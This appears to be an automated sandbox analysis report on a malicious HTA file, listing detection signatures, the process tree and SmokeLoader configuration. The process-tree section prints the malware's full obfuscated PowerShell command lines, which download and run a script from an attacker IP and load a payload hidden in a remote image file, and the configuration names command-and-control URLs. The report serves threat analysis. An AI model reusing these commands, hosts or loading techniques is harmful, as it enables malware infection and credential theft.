Edit tour
Windows
Analysis Report
bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
Overview
General Information
Detection
Cobalt Strike, HTMLPhisher, SmokeLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Benign windows process drops PE files
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected SmokeLoader
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Found evasive API chain (may stop execution after checking mutex)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 6736 cmdline:
mshta.exe "C:\Users\ user\Deskt op\bestthi ngsalwaysg etbesrenti relifethin gstogdomyb etterthign swithgreat .hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 5592 cmdline:
"C:\Window s\SysTEM32 \wiNdoWSPo WeRShElL\V 1.0\PoWERs HeLl.EXe" "pOWersheL L -E x BY PaSs -nop -W 1 - c De VIcECrEden TiAldePlOY MEnT.exe ; INvokE- EXPressiON ($(INvOkE- ExpressiON ('[SystEM. tExt.encoD inG]'+[cha r]0X3A+[ch ar]58+'UTF 8.GetsTRIn g([SyStEm. cOnVeRT]'+ [ChaR]0X3A +[chaR]58+ 'frombasE6 4StRIng('+ [chaR]34+' JFhvY0VSN2 1mYWMgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICA9 ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgQWRELX RZcGUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAt bWVNYmVSZE VGaW5pVElv TiAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICdbRG xsSW1wb3J0 KCJVcmxNT0 4iLCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIENo YXJTZXQgPS BDaGFyU2V0 LlVuaWNvZG UpXXB1Ymxp YyBzdGF0aW MgZXh0ZXJu IEludFB0ci BVUkxEb3du bG9hZFRvRm lsZShJbnRQ dHIgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBkbk hyTG8sc3Ry aW5nICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgam xXTWh0LHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE wsdWludCAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IFVEd1JCWE NTLEludFB0 ciAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIHFFS3 ZxKTsnICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW5BbUUgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AiZHpUayIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAtTmFNZV NQQUNFICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg bHhzQnRTTV B2ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgLVBh c3NUaHJ1Oy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICRYb2NF UjdtZmFjOj pVUkxEb3du bG9hZFRvRm lsZSgwLCJo dHRwOi8vMT A3LjE3Mi40 NC4xNzgvNT Mvc2VlbXli ZXN0bmV0d2 9ya3doaWNo Z2l2ZWJlc3 R0aGluZ3Nl bnRpcmVsaW Zld2l0aG1l LnRJRiIsIi RFTnY6QVBQ REFUQVxzZW VteWJlc3Ru ZXR3b3Jrd2 hpY2hnaXZl YmVzdHRoaW 5nc2VudGly ZWxpZmV3aX RoLnZiUyIs MCwwKTtzVE FydC1zbEVF UCgzKTtJRV ggICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAiJGVu VjpBUFBEQV RBXHNlZW15 YmVzdG5ldH dvcmt3aGlj aGdpdmViZX N0dGhpbmdz ZW50aXJlbG lmZXdpdGgu dmJTIg=='+ [chaR]0X22 +'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7076 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6036 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcE CrEdenTiAl dePlOYMEnT .exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 6588 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\tnaq44gy \tnaq44gy. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 5472 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S60DC.tmp" "c:\Users \user\AppD ata\Local\ Temp\tnaq4 4gy\CSCA55 E465C63A14 5CC9DC9276 A53775DB5. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 6964 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seemy bestnetwor kwhichgive bestthings entirelife with.vbS" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 6168 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCdzZVlpbW FnZVUnKydy bCA9IFB1SW h0JysndHBz JysnOicrJy 8vMTAxNy5m aWxlbWFpbC 5jb20vYXBp L2ZpbCcrJ2 UvZ2V0P2Zp bGVrZXk9Mk FhX2JXbzlS ZXU0NXQ3Ql Uxa1Znc2Q5 cFQ5cGdTU2 x2U3QnKydH cm5USUNmRm htVEtqM0xD NlNRdEljT2 NfVDM1dyZw a192aWQ9Zm Q0ZjYxNGJi MjA5YzYyYz E3MzA5NDUx NzZhMDkwNG YgUHVJO3Nl WXdlYkNsaW VudCA9IE5l dy1PYmplY3 QgU3lzdGVt Lk5ldC5XJy snZWJDbGll bnQ7c2VZaW 1hZ2VCeXRl cyA9IHNlWX dlYkNsaWVu JysndC5Eb3 dubG9hZERh dGEoc2VZaW 1hZ2VVcmwp O3NlWWltYW cnKydlVGV4 dCA9IFtTeX N0ZW0uVGV4 dC5FbmNvZG luZ106OlVU RjguR2V0U3 RyaW5nKHNl WWltYWdlQn l0JysnZXMp O3NlWXN0YX J0RmxhZyA9 IFB1STw8Qk FTRTY0Xycr J1NUQVJUPj 5QdUk7c2VZ ZW5kRicrJ2 xhZyA9IFB1 SScrJzw8Qk FTRTY0X0VO RD4+UHVJO3 NlWXN0YXJ0 SW5kZXggPS BzZVlpbWFn ZVRleHQuSW 5kZXhPZign KydzZVlzdG FydEZsYWcp O3NlWWVuZC crJ0luZGV4 ID0gc2VZaW 1hZ2VUZXh0 LkluZGV4T2 Yoc2VZZW5k RmxhZyk7cy crJ2VZc3Rh cnRJbmRleC AtZ2UgMCAt YW5kIHNlWW VuZEluZGV4 IC1ndCBzZV lzdGFydElu ZGV4O3MnKy dlWXN0YXJ0 SW5kZXggKz 0gc2VZc3Rh cnRGbGFnLk xlbmd0aDtz ZVliYXNlNj RMZW5ndGgg PSBzZVllbm RJbmRleCAt IHNlWXN0YX J0SW5kZXg7 c2VZYmFzZT Y0Q29tbWFu ZCA9JysnIH NlJysnWWlt YWcnKydlVC crJ2V4dC5T dWJzdHJpbm coc2VZc3Rh cnRJbmRleC wnKycgc2VZ YmFzZTY0TG VuZ3RoKTtz ZVliYXNlNj RSZXZlcnNl ZCA9IC1qb2 luIChzZVli YXNlNjRDb2 1tYW5kJysn LlRvQ2hhck FycmF5KCkg MnBPIEZvck UnKydhY2gt T2JqZWN0IH sgc2VZXyB9 KVstMS4uLS hzZVknKydi YXNlNjRDb2 1tYW5kLkxl bmd0aCldO3 NlWScrJ2Nv bW1hbmRCeX RlcyA9IFtT eXN0ZW0uQy crJ29udmVy dF06OkZyb2 1CYXNlNjRT dHJpbmcoJy snc2VZYmFz ZTY0UmV2ZX JzZWQpO3Nl WScrJ2xvYW RlZEFzc2Vt Ymx5ID0gW1 N5c3RlbS5S ZWZsJysnZW N0aW9uLkFz c2VtYmx5XS crJzo6TG9h ZChzZVljb2 1tYW5kQnl0 ZXMpO3NlWX ZhaU1ldGhv ZCA9IFsnKy dkbmxpYi5J Ty5Ib21lXS 5HZXRNZXRo b2QoUHVJVk FJUHVJKTtz ZVl2YWlNZS crJ3Rob2Qu SW52bycrJ2 tlKHNlWW51 bGwsIEAoUH VJdHh0LlRH UkZGUlcvMz UvODcxLjQ0 LjI3MS43MD EvLycrJzpw dHRoUHVJLC BQdUlkZXNh dGl2YWRvUH VJLCBQdUlk JysnZXNhdG l2YWRvUHVJ LCBQdScrJ0 lkZXNhdGl2 YWRvUHVJLC BQdUlhc3Bu ZXRfY29tcG lsJysnZXJQ dUksIFB1SW Rlc2F0aXZh ZG9QdUksIC crJ1B1SWRl c2F0aXZhZG 9QdUksUHVJ ZGVzYXRpdm FkbycrJ1B1 SSxQdUlkZX NhdGl2YWRv UHVJLFB1SW Rlc2F0aXZh ZG9QdUksUH VJZGVzYXRp dmFkb1B1SS xQdUlkZXNh dGl2YWRvUH VJLFB1STFQ dUksUHVJZG VzYXRpdmFk b1B1SSkpOy cpLnJFUGxh Q0UoJ1B1SS csW1N0cklu R11bQ0hBUl 0zOSkuckVQ bGFDRSgnMn BPJywnfCcp LnJFUGxhQ0 UoJ3NlWScs JyQnKXwgLi AoKGdWICcq TWRyKicpLm 5BbUVbMywx MSwyXS1qT0 lOJycp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6224 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5568 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "('seY imageU'+'r l = PuIht' +'tps'+':' +'//1017.f ilemail.co m/api/fil' +'e/get?fi lekey=2Aa_ bWo9Reu45t 7BU1kVgsd9 pT9pgSSlvS t'+'GrnTIC fFhmTKj3LC 6SQtIcOc_T 35w&pk_vid =fd4f614bb 209c62c173 0945176a09 04f PuI;se YwebClient = New-Obj ect System .Net.W'+'e bClient;se YimageByte s = seYweb Clien'+'t. DownloadDa ta(seYimag eUrl);seYi mag'+'eTex t = [Syste m.Text.Enc oding]::UT F8.GetStri ng(seYimag eByt'+'es) ;seYstartF lag = PuI< <BASE64_'+ 'START>>Pu I;seYendF' +'lag = Pu I'+'<<BASE 64_END>>Pu I;seYstart Index = se YimageText .IndexOf(' +'seYstart Flag);seYe nd'+'Index = seYimag eText.Inde xOf(seYend Flag);s'+' eYstartInd ex -ge 0 - and seYend Index -gt seYstartIn dex;s'+'eY startIndex += seYsta rtFlag.Len gth;seYbas e64Length = seYendIn dex - seYs tartIndex; seYbase64C ommand ='+ ' se'+'Yim ag'+'eT'+' ext.Substr ing(seYsta rtIndex,'+ ' seYbase6 4Length);s eYbase64Re versed = - join (seYb ase64Comma nd'+'.ToCh arArray() 2pO ForE'+ 'ach-Objec t { seY_ } )[-1..-(se Y'+'base64 Command.Le ngth)];seY '+'command Bytes = [S ystem.C'+' onvert]::F romBase64S tring('+'s eYbase64Re versed);se Y'+'loaded Assembly = [System.R efl'+'ecti on.Assembl y]'+'::Loa d(seYcomma ndBytes);s eYvaiMetho d = ['+'dn lib.IO.Hom e].GetMeth od(PuIVAIP uI);seYvai Me'+'thod. Invo'+'ke( seYnull, @ (PuItxt.TG RFFRW/35/8 71.44.271. 701//'+':p tthPuI, Pu Idesativad oPuI, PuId '+'esativa doPuI, Pu' +'Idesativ adoPuI, Pu Iaspnet_co mpil'+'erP uI, PuIdes ativadoPuI , '+'PuIde sativadoPu I,PuIdesat ivado'+'Pu I,PuIdesat ivadoPuI,P uIdesativa doPuI,PuId esativadoP uI,PuIdesa tivadoPuI, PuI1PuI,Pu Idesativad oPuI));'). rEPlaCE('P uI',[StrIn G][CHAR]39 ).rEPlaCE( '2pO','|') .rEPlaCE(' seY','$')| . ((gV '* Mdr*').nAm E[3,11,2]- jOIN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - aspnet_compiler.exe (PID: 3636 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_compil er.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2) - explorer.exe (PID: 2580 cmdline:
C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5) - explorer.exe (PID: 4928 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: DD6597597673F72E10C9DE7901FBA0A8) - explorer.exe (PID: 796 cmdline:
C:\Windows \explorer. exe MD5: 662F4F92FDE3557E86D110526BB578D5) - explorer.exe (PID: 7052 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: DD6597597673F72E10C9DE7901FBA0A8) - explorer.exe (PID: 7100 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: DD6597597673F72E10C9DE7901FBA0A8) - explorer.exe (PID: 3484 cmdline:
C:\Windows \explorer. exe MD5: 662F4F92FDE3557E86D110526BB578D5) - WerFault.exe (PID: 5368 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 3 484 -s 724 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - explorer.exe (PID: 692 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: DD6597597673F72E10C9DE7901FBA0A8) - explorer.exe (PID: 5432 cmdline:
C:\Windows \explorer. exe MD5: 662F4F92FDE3557E86D110526BB578D5) - explorer.exe (PID: 3588 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: DD6597597673F72E10C9DE7901FBA0A8) - explorer.exe (PID: 2164 cmdline:
C:\Windows \explorer. exe MD5: 662F4F92FDE3557E86D110526BB578D5)
- djvbaae (PID: 3052 cmdline:
C:\Users\u ser\AppDat a\Roaming\ djvbaae MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2) - conhost.exe (PID: 5548 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. |
{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security | ||
JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security | ||
JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
Click to see the 8 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |